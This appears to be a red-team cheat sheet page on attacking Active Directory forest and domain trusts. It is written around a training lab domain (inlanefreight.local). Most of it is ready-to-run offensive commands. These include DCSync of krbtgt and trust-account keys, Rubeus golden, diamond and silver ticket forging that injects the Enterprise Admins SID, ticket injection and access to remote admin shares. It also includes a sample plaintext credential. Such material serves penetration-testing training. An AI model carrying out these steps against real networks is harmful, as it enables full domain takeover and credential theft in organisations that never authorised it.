Forest and Trust Attacks

Trust Enumeration

Enumerate Trusts

ldapsearch (objectClass=trustedDomain)
ldapsearch (objectClass=trustedDomain) --attributes trustPartner,trustDirection,trustAttributes,flatName

Trust Account (won't appear in CN=Users)

ldapsearch (samAccountType=805306370) --attributes samAccountName
# Output: sAMAccountName: PARTNER$

trustDirection Values

Value

Meaning

TRUST_DIRECTION_DISABLED

TRUST_DIRECTION_INBOUND

TRUST_DIRECTION_OUTBOUND

TRUST_DIRECTION_BIDIRECTIONAL

trustAttributes Flags

Value

Flag

Description

TRUST_ATTRIBUTE_NON_TRANSITIVE

Non-transitive trust

TRUST_ATTRIBUTE_QUARANTINED_DOMAIN

SID filtering enabled

TRUST_ATTRIBUTE_FOREST_TRANSITIVE

Transitive between forests

TRUST_ATTRIBUTE_WITHIN_FOREST

Between domains in same forest

TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL

Between domains in different forests (SID filtering implied)

Parent-Child Trust Abuse

When DA in child domain → escalate to Enterprise Admin in forest root.

Get Child Domain krbtgt Hash

dcsync dublin.inlanefreight.local DUBLIN\krbtgt

Get Child Domain SID

ldapsearch (objectClass=domain) --attributes objectSid

Get Parent Domain SID

ldapsearch (objectClass=domain) --attributes objectSid --hostname ilf-dc-1.inlanefreight.local --dn DC=inlanefreight,DC=local

Forge Golden Ticket with Enterprise Admins SID

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<child-krbtgt-aes256> /user:Administrator /domain:dublin.inlanefreight.local /sid:<child-domain-sid> /sids:<parent-domain-sid>-519 /nowrap

Parameters:

/aes256 - Child domain's krbtgt AES256 hash
/user - User to impersonate
/domain - Child domain FQDN
/sid - Child domain SID
/sids - Parent domain SID with -519 (Enterprise Admins RID)

Save to file:

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<hash> /user:Administrator /domain:dublin.inlanefreight.local /sid:<child-sid> /sids:<parent-sid>-519 /outfile:C:\Users\Attacker\Desktop\golden

Use the Ticket

kerberos_ticket_use C:\Users\Attacker\Desktop\golden
run klist
ls \\ilf-dc-1\c$

Alternative: Diamond Ticket

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /sids:<parent-domain-sid>-512 /krbkey:<child-krbtgt-aes256> /nowrap

One-Way Inbound Trust (You're in Trusted Domain)

You can access resources in the trusting domain.

Verify Trust Direction

ldapsearch (objectClass=trustedDomain) --attributes trustDirection,trustPartner,trustAttributes,flatName

# trustDirection: 1 = INBOUND = you're in trusted domain

Find Foreign Security Principals

ldapsearch (objectClass=foreignSecurityPrincipal) --attributes cn,memberOf --hostname partner.com --dn DC=partner,DC=com

Output shows SID from your domain that has access to trusting domain.

Identify the Principal

ldapsearch (objectSid=S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-XXXX)

Enumerate Trusting Domain Computers

ldapsearch (samAccountType=805306369) --attributes samAccountName --dn DC=partner,DC=com --hostname partner.com

Forge Inter-Realm Referral Ticket

Get inter-realm key:

make_token INLANEFREIGHT\bjohnson Passw0rd!
dcsync inlanefreight.local INLANEFREIGHT\PARTNER$
rev2self

Forge referral ticket:

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /user:jyoung /domain:INLANEFREIGHT.LOCAL /sid:<trusted-domain-sid> /id:<user-rid> /groups:513,1106,6102 /service:krbtgt/partner.com /rc4:<ntlm-hash> /nowrap

Request service ticket in trusting domain:

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/par-jmp-1.partner.com /dc:par-dc-1.partner.com /ticket:<inter-realm-tgt> /nowrap

Inject and access:

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:<service-ticket>
run klist
ls \\par-jmp-1.partner.com\c$

One-Way Outbound Trust (You're in Trusting Domain)

You're on the "wrong" side - no direct access to trusted domain.

Verify Trust Direction

ldapsearch (objectClass=trustedDomain) --attributes trustDirection,trustPartner,trustAttributes,flatName

# trustDirection: 2 = OUTBOUND = you're in trusting domain

Get TDO GUID

ldapsearch (objectClass=trustedDomain) --attributes name,objectGUID
# objectGUID: 288d9ee6-2b3c-42aa-bef8-959ab4e484ed

DCSync the Inter-Realm Key

mimikatz lsadump::dcsync /domain:partner.com /guid:{288d9ee6-2b3c-42aa-bef8-959ab4e484ed}

[Out] = current key, [Out-1] = previous key

Request TGT as Trust Account

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:PARTNER$ /domain:INLANEFREIGHT.LOCAL /dc:ilf-dc-1.inlanefreight.local /rc4:<inter-realm-key> /nowrap

Inject and Enumerate (High Integrity)

make_token INLANEFREIGHT\PARTNER$ FakePass
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:<ticket>
run klist
ldapsearch (objectClass=domain) --dn DC=inlanefreight,DC=local --attributes name,objectSid --hostname inlanefreight.local

Quick Reference

Scenario

Trust Direction

Strategy

Child → Parent

Bidirectional

Golden ticket with Enterprise Admins SID

Trusted → Trusting

Inbound (1)

Find foreign principals, forge referral tickets

Trusting → Trusted

Outbound (2)

DCSync trust account, use as stepping stone

PreviousEnumeration NextImpersonation

Last updated 1 month ago

hashtagTrust Enumeration

hashtagEnumerate Trusts

hashtagTrust Account (won't appear in CN=Users)

hashtagtrustDirection Values

hashtagtrustAttributes Flags

hashtagParent-Child Trust Abuse

hashtagGet Child Domain krbtgt Hash

hashtagGet Child Domain SID

hashtagGet Parent Domain SID

hashtagForge Golden Ticket with Enterprise Admins SID

hashtagUse the Ticket

hashtagAlternative: Diamond Ticket

hashtagOne-Way Inbound Trust (You're in Trusted Domain)

hashtagVerify Trust Direction

hashtagFind Foreign Security Principals

hashtagIdentify the Principal

hashtagEnumerate Trusting Domain Computers

hashtagForge Inter-Realm Referral Ticket

hashtagOne-Way Outbound Trust (You're in Trusting Domain)

hashtagVerify Trust Direction

hashtagGet TDO GUID

hashtagDCSync the Inter-Realm Key

hashtagRequest TGT as Trust Account

hashtagInject and Enumerate (High Integrity)

hashtagQuick Reference

Trust Enumeration

Enumerate Trusts

Trust Account (won't appear in CN=Users)

trustDirection Values

trustAttributes Flags

Parent-Child Trust Abuse

Get Child Domain krbtgt Hash

Get Child Domain SID

Get Parent Domain SID

Forge Golden Ticket with Enterprise Admins SID

Use the Ticket

Alternative: Diamond Ticket

One-Way Inbound Trust (You're in Trusted Domain)

Verify Trust Direction

Find Foreign Security Principals

Identify the Principal

Enumerate Trusting Domain Computers

Forge Inter-Realm Referral Ticket

One-Way Outbound Trust (You're in Trusting Domain)

Verify Trust Direction

Get TDO GUID

DCSync the Inter-Realm Key

Request TGT as Trust Account

Inject and Enumerate (High Integrity)

Quick Reference